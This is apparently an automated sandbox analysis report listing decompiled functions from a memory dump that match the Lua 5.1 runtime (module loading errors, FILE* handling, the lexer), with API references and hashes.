luaL_error.LUA5.1(?,error loading module '%s' from file '%s':%s,00000000,?,?,00000000,100163DA,?,00000000), ref: 1001658C

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Strings

error loading module '%s' from file '%s':%s, xrefs: 10016586

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$L_error.L_where.lua_concat.lua_error.lua_pushvfstring.
String ID: error loading module '%s' from file '%s':%s
API String ID: 2484346184-1344418331
Opcode ID: 32cf2b706682f2f2baa1de6659de6794de143f5127e0f7a532343d27c4b938ec
Instruction ID: 5dced8c37d1bd659f57fbec0a4f264a68f6852609036cac7c1fca2472e822d55
Opcode Fuzzy Hash: 32cf2b706682f2f2baa1de6659de6794de143f5127e0f7a532343d27c4b938ec
Instruction Fuzzy Hash: C5D05BAA95522136E501E5047C03FDB224CCF15254F180114F514761C7D655668201F6

Uniqueness

Uniqueness Score: -1.00%

Function 100121F0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100121F0(intOrPtr _a4) {
				void* _t6;
				intOrPtr* _t7;
				void* _t11;

				_t8 = _a4;
				_t7 = E100024A0(_a4, 4);
				 *_t7 = 0;
				E10001B90(_t6, _t11, _t8, 0xffffd8f0, "FILE*");
				E10001F20(_t11, _t8, 0xfffffffe);
				return _t7;
			}

0x100121f1
0x100121fe
0x1001220b
0x10012211
0x10012219
0x10012225

APIs

lua_newuserdata.LUA5.1(?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin,?,1001A2F0,10017718), ref: 100121F9
lua_getfield.LUA5.1(?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600,00000001,stdin), ref: 10012211

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,FILE*,?,00000004,?,?,10012D5C,?,?,?,10012BF3,?,75974600), ref: 10012219

Strings

FILE*, xrefs: 10012200

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_getfield.lua_newuserdata.lua_setmetatable.
String ID: FILE*
API String ID: 1122121683-3635956593
Opcode ID: 5bdf5ad4eef6875ca214745b2dc5dd3528bcc54185bceed1b74d6547d3e01608
Instruction ID: 7134924bfd24a7a02b8d9ad7f1bdac7bf48051cf3fdc09c6721267f6de9bdc2a
Opcode Fuzzy Hash: 5bdf5ad4eef6875ca214745b2dc5dd3528bcc54185bceed1b74d6547d3e01608
Instruction Fuzzy Hash: 18D0A73A61913236E500A61C6C02FDF229DCFC61B4F140121F304A72CAEB74784242FA

Uniqueness

Uniqueness Score: -1.00%

Function 10012010, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E10012010(void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr* _t6;

				_t5 = _a4;
				_t6 = E1000F370(__eflags, __fp0, _t5, 1, "FILE*");
				if( *_t6 == 0) {
					_push("attempt to use a closed file");
					_push(_t5);
					E1000F230();
				}
				return  *_t6;
			}

0x10012012
0x10012023
0x1001202b
0x1001202d
0x10012032
0x10012033
0x10012038
0x1001203f

APIs

luaL_checkudata.LUA5.1(?,00000001,FILE*,?,?,10011FFB,?), ref: 1001201E

Part of subcall function 1000F370: lua_touserdata.LUA5.1(?,?), ref: 1000F37E
Part of subcall function 1000F370: lua_getmetatable.LUA5.1(?,?), ref: 1000F392
Part of subcall function 1000F370: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F3A5
Part of subcall function 1000F370: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 1000F3AF
Part of subcall function 1000F370: lua_settop.LUA5.1(?,000000FD), ref: 1000F3BE

luaL_error.LUA5.1(?,attempt to use a closed file,?,10011FFB,?), ref: 10012033

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Strings

FILE*, xrefs: 10012016
attempt to use a closed file, xrefs: 1001202D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkudata.L_error.L_where.lua_concat.lua_error.lua_getfield.lua_getmetatable.lua_pushvfstring.lua_rawequal.lua_settop.lua_touserdata.
String ID: FILE*$attempt to use a closed file
API String ID: 3655263557-999929173
Opcode ID: 676362a25ccf0682f74e64b40a098e7f8bf8bc81a451623ecde0bc1d9f83abfc
Instruction ID: 2c1477c53ff95216f56ed172b42eed7a0651bb4036367a1aa81734a6bd91c4e2
Opcode Fuzzy Hash: 676362a25ccf0682f74e64b40a098e7f8bf8bc81a451623ecde0bc1d9f83abfc
Instruction Fuzzy Hash: 2FD0A77A5001006BD230D518BC41FEF77E4DBD76B4F05042EF5446B102E37999C296E2

Uniqueness

Uniqueness Score: -1.00%

Function 10012040, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10012040(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t12;

				_t7 = _a4;
				E10001D20(_t12, _t7, 1);
				E10001B90(_t6, _t12, _t7, 0xffffffff, "__close");
				_push(_t7);
				return  *((intOrPtr*)(E100017E0(_t12, _t7, 0xffffffff)))();
			}

0x10012041
0x10012048
0x10012055
0x1001205d
0x1001206f

APIs

lua_getfenv.LUA5.1(?,00000001,?,10012001,?,?), ref: 10012048
lua_getfield.LUA5.1(?,000000FF,__close,?,00000001,?,10012001,?,?), ref: 10012055

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_tocfunction.LUA5.1(?,000000FF,?,?,?,10012001,?,?), ref: 10012061

Strings

__close, xrefs: 1001204D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_getfenv.lua_getfield.lua_tocfunction.
String ID: __close
API String ID: 3835761185-1611303643
Opcode ID: 89373ea785e02535e1d1e7e699091443d89e53cb6170c468e6bc536e5118f911
Instruction ID: 6d658d750cfff7053f7be81a501ed09e58c9c10ff223492455c8d9e02a99d12d
Opcode Fuzzy Hash: 89373ea785e02535e1d1e7e699091443d89e53cb6170c468e6bc536e5118f911
Instruction Fuzzy Hash: 25D0C96A80A43132E801B29C3C02DCF35988F5B2F5F190351F538762DBEAAA769241F7

Uniqueness

Uniqueness Score: -1.00%

Function 10013E50, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E10013E50(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t7;

				_t7 = _a4;
				E1000F410(__ebx, __eflags, _t7, 1, 5);
				_push("\'setn\' is obsolete");
				_push(_t7);
				E1000F230();
				E100013D0(__eflags, _t7, 1);
				return 1;
			}

0x10013e51
0x10013e5a
0x10013e5f
0x10013e64
0x10013e65
0x10013e6d
0x10013e7b

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10013E5A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_error.LUA5.1(?,'setn' is obsolete,?,00000001,00000005), ref: 10013E65

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_pushvalue.LUA5.1(?,00000001,?,'setn' is obsolete,?,00000001,00000005), ref: 10013E6D

Strings

'setn' is obsolete, xrefs: 10013E5F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.L_error.L_where.lua_concat.lua_error.lua_pushvalue.lua_pushvfstring.lua_type.
String ID: 'setn' is obsolete
API String ID: 1691250520-3428337588
Opcode ID: 51f58fc880e26dba083434a1ed2343e1932b338689e4197df332473a0e73f3a0
Instruction ID: 16b7d17d80cd25ed47ab0d222f8ee37cd6ce385ae83042bde45d997df5ff2d28
Opcode Fuzzy Hash: 51f58fc880e26dba083434a1ed2343e1932b338689e4197df332473a0e73f3a0
Instruction Fuzzy Hash: A8D0123956593031F511A1187C43FDF11498F46794F050054B6003A5C7E6DA77C205EA

Uniqueness

Uniqueness Score: -1.00%

Function 100077F0, Relevance: 6.2, APIs: 4, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E100077F0(signed int* _a4, signed int _a8) {
				signed int _t120;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed int _t130;
				signed int _t132;
				signed int _t134;
				void* _t137;
				signed int _t141;
				signed int _t143;
				signed int _t153;
				signed int _t155;
				signed int _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t184;
				signed int _t188;
				signed int _t196;
				signed int* _t197;
				intOrPtr* _t198;
				void* _t199;

				_t198 = __imp___isctype;
				_t197 = _a4;
				 *((intOrPtr*)(_t197[0xf] + 4)) = 0;
				while(1) {
					L1:
					_t120 =  *_t197;
					_t4 = _t120 + 1; // 0x1
					if(_t4 > 0x7f) {
						break;
					}
					switch( *((intOrPtr*)(0 +  &M10007DCC))) {
						case 0:
							__eax = 0x11f;
							return 0x11f;
							goto L103;
						case 1:
							E10007E80(_t197);
							_t199 = _t199 + 4;
							goto L1;
						case 2:
							__ecx = _a8;
							__edx =  *__esi;
							_push(_a8);
							_push( *__esi);
							_push(__esi);
							__eax = E10008460(__ebx, __edi, __eflags);
							__esp = __esp + 0xc;
							__eax = 0x11e;
							return 0x11e;
							goto L103;
						case 3:
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							__eflags = __eax - 0x2d;
							 *__esi = __eax;
							if(__eax != 0x2d) {
								__eax = 0x2d;
								return 0x2d;
							} else {
								__eax = __esi[0xe];
								__ecx =  *__eax;
								__eflags = __ecx - __ebx;
								__edx = __ecx - 1;
								 *__eax = __ecx - 1;
								if(__ecx <= __ebx) {
									__eax = __esi[0xe];
									__eax = E1000EF10(__esi[0xe]);
								} else {
									__ecx = __esi[0xe];
									__eax = 0;
									 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
									 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								}
								__eflags = __eax - 0x5b;
								 *__esi = __eax;
								if(__eflags != 0) {
									L14:
									__eflags =  *__esi - 0xa;
									if(__eflags != 0) {
										while(1) {
											__eax =  *__esi;
											__eflags = __eax - 0xd;
											if(__eflags == 0) {
												goto L1;
											}
											__eflags = __eax - 0xffffffff;
											if(__eflags != 0) {
												__eax = __esi[0xe];
												__ecx =  *__eax;
												__eflags = __ecx - __ebx;
												__edx = __ecx - 1;
												 *__eax = __ecx - 1;
												if(__ecx <= __ebx) {
													__eax = __esi[0xe];
													__eax = E1000EF10(__esi[0xe]);
												} else {
													__ecx = __esi[0xe];
													__eax = 0;
													 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
													 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
												}
												__eflags = __eax - 0xa;
												 *__esi = __eax;
												if(__eflags != 0) {
													continue;
												} else {
												}
											}
											goto L1;
										}
									}
								} else {
									__eax = E10008160(__eflags, __esi);
									__ecx = __esi[0xf];
									__eflags = __eax - __ebx;
									__esi[0xf][1] = __ebx;
									if(__eflags < 0) {
										goto L14;
									} else {
										_push(__eax);
										_push(__ebx);
										_push(__esi);
										__eax = E10008200(__eflags);
										__edx = __esi[0xf];
										__esp = __esp + 0xc;
										__esi[0xf][1] = __ebx;
									}
								}
								goto L1;
							}
							goto L103;
						case 4:
							 *__esi = E10007620(__esi,  *__esi);
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							 *__esi = __eax;
							__eax = E10007F10(__esi, ".");
							__eflags = __eax;
							if(__eax == 0) {
								__ecx = __imp____mb_cur_max;
								__eflags =  *__imp____mb_cur_max - 1;
								if( *__imp____mb_cur_max <= 1) {
									__ecx = __imp___pctype;
									__eax =  *__esi;
									__edx =  *__imp___pctype;
									__eax =  *__esi & 0x00000004;
									__eflags = __eax;
								} else {
									__edx =  *__esi;
									_push(4);
									_push( *__esi);
									__eax =  *__ebp();
									__esp = __esp + 8;
								}
								__eflags = __eax - __ebx;
								if(__eflags != 0) {
									L83:
									E10007F80(__eflags, _t205, _t197, _a8);
									return 0x11c;
								} else {
									__eax = 0x2e;
									return 0x2e;
								}
							} else {
								__eax = E10007F10(__esi, ".");
								__eax =  ~__eax;
								asm("sbb eax, eax");
								__eax =  ~__eax;
								__eax = __eax + 0x116;
								__eflags = __eax;
								return __eax;
							}
							goto L103;
						case 5:
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							__eflags = __eax - 0x3d;
							 *__esi = __eax;
							if(__eax == 0x3d) {
								__eax = __esi[0xe];
								__ecx =  *__eax;
								__eflags = __ecx - __ebx;
								__edx = __ecx - 1;
								 *__eax = __ecx - 1;
								if(__ecx <= __ebx) {
									__eax = __esi[0xe];
									 *__esi = E1000EF10(__esi[0xe]);
									__eax = 0x11a;
									return 0x11a;
								} else {
									__ecx = __esi[0xe];
									__eax = 0;
									__edx =  *(__ecx + 4);
									__edx =  &(( *(__ecx + 4))[0]);
									__eflags = __edx;
									 *(__ecx + 4) = __edx;
									 *__esi = 0;
									__eax = 0x11a;
									return 0x11a;
								}
							} else {
								__eax = 0x3c;
								return 0x3c;
							}
							goto L103;
						case 6:
							L35:
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							__eflags = __eax - 0x3d;
							 *__esi = __eax;
							if(__eax == 0x3d) {
								__eax = __esi[0xe];
								__ecx =  *__eax;
								__eflags = __ecx - __ebx;
								__edx = __ecx - 1;
								 *__eax = __ecx - 1;
								if(__ecx <= __ebx) {
									__eax = __esi[0xe];
									 *__esi = E1000EF10(__esi[0xe]);
									__eax = 0x118;
									return 0x118;
								} else {
									__ecx = __esi[0xe];
									__eax = 0;
									__edx =  *(__ecx + 4);
									__edx =  &(( *(__ecx + 4))[0]);
									__eflags = __edx;
									 *(__ecx + 4) = __edx;
									 *__esi = 0;
									__eax = 0x118;
									return 0x118;
								}
							} else {
								__eax = 0x3d;
								return 0x3d;
							}
							goto L103;
						case 7:
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							__eflags = __eax - 0x3d;
							 *__esi = __eax;
							if(__eax == 0x3d) {
								__eax = __esi[0xe];
								__ecx =  *__eax;
								__eflags = __ecx - __ebx;
								__edx = __ecx - 1;
								 *__eax = __ecx - 1;
								if(__ecx <= __ebx) {
									__eax = __esi[0xe];
									 *__esi = E1000EF10(__esi[0xe]);
									__eax = 0x119;
									return 0x119;
								} else {
									__ecx = __esi[0xe];
									__eax = 0;
									__edx =  *(__ecx + 4);
									__edx =  &(( *(__ecx + 4))[0]);
									__eflags = __edx;
									 *(__ecx + 4) = __edx;
									 *__esi = 0;
									__eax = 0x119;
									return 0x119;
								}
							} else {
								__eax = 0x3e;
								return 0x3e;
							}
							goto L103;
						case 8:
							__eax = E10008160(__eflags, __esi);
							__eflags = __eax - __ebx;
							if(__eflags < 0) {
								__eflags = __eax - 0xffffffff;
								if(__eflags != 0) {
									__eax = E10007560(__eflags, __esi, "invalid long string delimiter", 0x11e);
									goto L35;
								} else {
									__eax = 0x5b;
									return 0x5b;
								}
							} else {
								__ecx = _a8;
								_push(__eax);
								_push(_a8);
								_push(__esi);
								__eax = E10008200(__eflags);
								__esp = __esp + 0xc;
								__eax = 0x11e;
								return 0x11e;
							}
							goto L103;
						case 9:
							__eax = __esi[0xe];
							__ecx =  *__eax;
							__eflags = __ecx - __ebx;
							__edx = __ecx - 1;
							 *__eax = __ecx - 1;
							if(__ecx <= __ebx) {
								__eax = __esi[0xe];
								__eax = E1000EF10(__esi[0xe]);
							} else {
								__ecx = __esi[0xe];
								__eax = 0;
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
								 *(__ecx + 4) =  &(( *(__ecx + 4))[0]);
							}
							__eflags = __eax - 0x3d;
							 *__esi = __eax;
							if(__eax == 0x3d) {
								__eax = __esi[0xe];
								__ecx =  *__eax;
								__eflags = __ecx - __ebx;
								__edx = __ecx - 1;
								 *__eax = __ecx - 1;
								if(__ecx <= __ebx) {
									__eax = __esi[0xe];
									 *__esi = E1000EF10(__esi[0xe]);
									__eax = 0x11b;
									return 0x11b;
								} else {
									__ecx = __esi[0xe];
									__eax = 0;
									__edx =  *(__ecx + 4);
									__edx =  &(( *(__ecx + 4))[0]);
									__eflags = __edx;
									 *(__ecx + 4) = __edx;
									 *__esi = 0;
									__eax = 0x11b;
									return 0x11b;
								}
							} else {
								__eax = 0x7e;
								return 0x7e;
							}
							L103:
						case 0xa:
							goto L22;
					}
				}
				L22:
				__eflags =  *__imp____mb_cur_max - 1;
				if( *__imp____mb_cur_max <= 1) {
					_t122 =  *( *__imp___pctype + _t120 * 2) & 0x00000008;
					__eflags = _t122;
				} else {
					_t122 =  *_t198(_t120, 8);
					_t199 = _t199 + 8;
				}
				__eflags = _t122;
				if(_t122 == 0) {
					__eflags =  *__imp____mb_cur_max - 1;
					if( *__imp____mb_cur_max <= 1) {
						_t125 =  *( *__imp___pctype +  *_t197 * 2) & 0x00000004;
						__eflags = _t125;
					} else {
						_t125 =  *_t198( *_t197, 4);
						_t199 = _t199 + 8;
					}
					__eflags = _t125;
					if(__eflags == 0) {
						__eflags =  *__imp____mb_cur_max - 1;
						if( *__imp____mb_cur_max <= 1) {
							_t128 =  *( *__imp___pctype +  *_t197 * 2) & 0x00000103;
							__eflags = _t128;
						} else {
							_t128 =  *_t198( *_t197, 0x103);
							_t199 = _t199 + 8;
						}
						__eflags = _t128;
						if(_t128 != 0) {
							L92:
							E10007620(_t197,  *_t197);
							_t130 = _t197[0xe];
							_t199 = _t199 + 8;
							_t168 =  *_t130;
							__eflags = _t168;
							 *_t130 = _t168 - 1;
							if(_t168 <= 0) {
								_t132 = E1000EF10(_t197[0xe]);
								_t199 = _t199 + 4;
							} else {
								_t173 = _t197[0xe];
								_t184 =  *((intOrPtr*)(_t173 + 4));
								_t132 =  *_t184;
								 *((intOrPtr*)(_t173 + 4)) = _t184 + 1;
							}
							 *_t197 = _t132;
							__eflags =  *__imp____mb_cur_max - 1;
							if( *__imp____mb_cur_max <= 1) {
								_t134 =  *( *__imp___pctype + _t132 * 2) & 0x00000107;
								__eflags = _t134;
							} else {
								_t134 =  *_t198(_t132, 0x107);
								_t199 = _t199 + 8;
							}
							__eflags = _t134;
						} else {
							_t196 =  *_t197;
							__eflags = _t196 - 0x5f;
							if(_t196 == 0x5f) {
								goto L92;
								do {
									do {
										goto L92;
									} while (_t134 != 0);
									__eflags =  *_t197 - 0x5f;
								} while (__eflags == 0);
								_t137 = E100076C0(__eflags, _t197,  *(_t197[0xf]),  *((intOrPtr*)(_t197[0xf] + 4)));
								_t171 =  *((intOrPtr*)(_t137 + 6));
								__eflags = _t171;
								if(_t171 <= 0) {
									 *_a8 = _t137;
									return 0x11d;
								} else {
									_t141 = (_t171 & 0x000000ff) + 0x100;
									__eflags = _t141;
									return _t141;
								}
							} else {
								_t143 = _t197[0xe];
								_t174 =  *_t143;
								__eflags = _t174;
								_t102 = _t174 - 1; // 0x7597414f
								 *_t143 = _t102;
								if(_t174 <= 0) {
									 *_t197 = E1000EF10(_t197[0xe]);
									return _t196;
								} else {
									_t175 = _t197[0xe];
									_t188 =  *(_t175 + 4) + 1;
									__eflags = _t188;
									 *(_t175 + 4) = _t188;
									 *_t197 = 0;
									return _t196;
								}
							}
						}
					} else {
						goto L83;
					}
				} else {
					_t153 = _t197[0xe];
					_t176 =  *_t153;
					__eflags = _t176;
					_t33 = _t176 - 1; // 0x759753f3
					 *_t153 = _t33;
					if(__eflags <= 0) {
						_t155 = E1000EF10(_t197[0xe]);
						_t199 = _t199 + 4;
						 *_t197 = _t155;
					} else {
						 *((intOrPtr*)(_t197[0xe] + 4)) =  *((intOrPtr*)(_t197[0xe] + 4)) + 1;
						 *_t197 = 0;
					}
					goto L1;
				}
				goto L103;
			}

0x100077f2
0x100077f9
0x10007803
0x10007806
0x10007806
0x10007806
0x10007808
0x1000780e
0x00000000
0x00000000
0x1000781c
0x00000000
0x10007c6a
0x10007c70
0x00000000
0x00000000
0x10007824
0x10007829
0x00000000
0x00000000
0x10007baf
0x10007bb3
0x10007bb5
0x10007bb6
0x10007bb7
0x10007bb8
0x10007bbd
0x10007bc0
0x10007bc9
0x00000000
0x00000000
0x1000782e
0x10007831
0x10007833
0x10007835
0x10007838
0x1000783a
0x1000784c
0x10007850
0x1000783c
0x1000783c
0x1000783f
0x10007846
0x10007847
0x10007847
0x10007858
0x1000785b
0x1000785d
0x10007974
0x1000797a
0x10007863
0x10007863
0x10007866
0x10007868
0x1000786a
0x1000786d
0x1000786f
0x10007881
0x10007885
0x10007871
0x10007871
0x10007874
0x1000787b
0x1000787c
0x1000787c
0x1000788d
0x10007890
0x10007892
0x100078bd
0x100078bd
0x100078c0
0x100078c6
0x100078c6
0x100078c8
0x100078cb
0x00000000
0x00000000
0x100078d1
0x100078d4
0x100078da
0x100078dd
0x100078df
0x100078e1
0x100078e4
0x100078e6
0x100078f8
0x100078fc
0x100078e8
0x100078e8
0x100078eb
0x100078f2
0x100078f3
0x100078f3
0x10007904
0x10007907
0x10007909
0x00000000
0x00000000
0x1000790b
0x10007909
0x00000000
0x100078d4
0x100078c6
0x10007894
0x10007895
0x1000789a
0x100078a0
0x100078a2
0x100078a5
0x00000000
0x100078a7
0x100078a7
0x100078a8
0x100078a9
0x100078aa
0x100078af
0x100078b2
0x100078b5
0x100078b5
0x100078a5
0x00000000
0x10007892
0x00000000
0x00000000
0x10007bce
0x10007bd3
0x10007bd9
0x10007bdb
0x10007bdd
0x10007be0
0x10007be2
0x10007bf4
0x10007bf8
0x10007be4
0x10007be4
0x10007be7
0x10007bee
0x10007bef
0x10007bef
0x10007c06
0x10007c08
0x10007c10
0x10007c12
0x10007c32
0x10007c38
0x10007c3b
0x10007c49
0x10007c4f
0x10007c51
0x10007c56
0x10007c56
0x10007c3d
0x10007c3d
0x10007c3f
0x10007c41
0x10007c42
0x10007c44
0x10007c44
0x10007c59
0x10007c5b
0x10007c9c
0x10007ca2
0x10007cb3
0x10007c60
0x10007c60
0x10007c66
0x10007c66
0x10007c14
0x10007c1a
0x10007c22
0x10007c24
0x10007c27
0x10007c2b
0x10007c2b
0x10007c31
0x10007c31
0x00000000
0x00000000
0x10007a3e
0x10007a41
0x10007a43
0x10007a45
0x10007a48
0x10007a4a
0x10007a5c
0x10007a60
0x10007a4c
0x10007a4c
0x10007a4f
0x10007a56
0x10007a57
0x10007a57
0x10007a68
0x10007a6b
0x10007a6d
0x10007a79
0x10007a7c
0x10007a7e
0x10007a80
0x10007a83
0x10007a85
0x10007aa1
0x10007aad
0x10007aaf
0x10007ab8
0x10007a87
0x10007a87
0x10007a8a
0x10007a8d
0x10007a92
0x10007a92
0x10007a93
0x10007a96
0x10007a9a
0x10007aa0
0x10007aa0
0x10007a72
0x10007a72
0x10007a78
0x10007a78
0x00000000
0x00000000
0x100079c3
0x100079c3
0x100079c6
0x100079c8
0x100079ca
0x100079cd
0x100079cf
0x100079e1
0x100079e5
0x100079d1
0x100079d1
0x100079d4
0x100079db
0x100079dc
0x100079dc
0x100079ed
0x100079f0
0x100079f2
0x100079fe
0x10007a01
0x10007a03
0x10007a05
0x10007a08
0x10007a0a
0x10007a26
0x10007a32
0x10007a34
0x10007a3d
0x10007a0c
0x10007a0c
0x10007a0f
0x10007a12
0x10007a17
0x10007a17
0x10007a18
0x10007a1b
0x10007a1f
0x10007a25
0x10007a25
0x100079f7
0x100079f7
0x100079fd
0x100079fd
0x00000000
0x00000000
0x10007ab9
0x10007abc
0x10007abe
0x10007ac0
0x10007ac3
0x10007ac5
0x10007ad7
0x10007adb
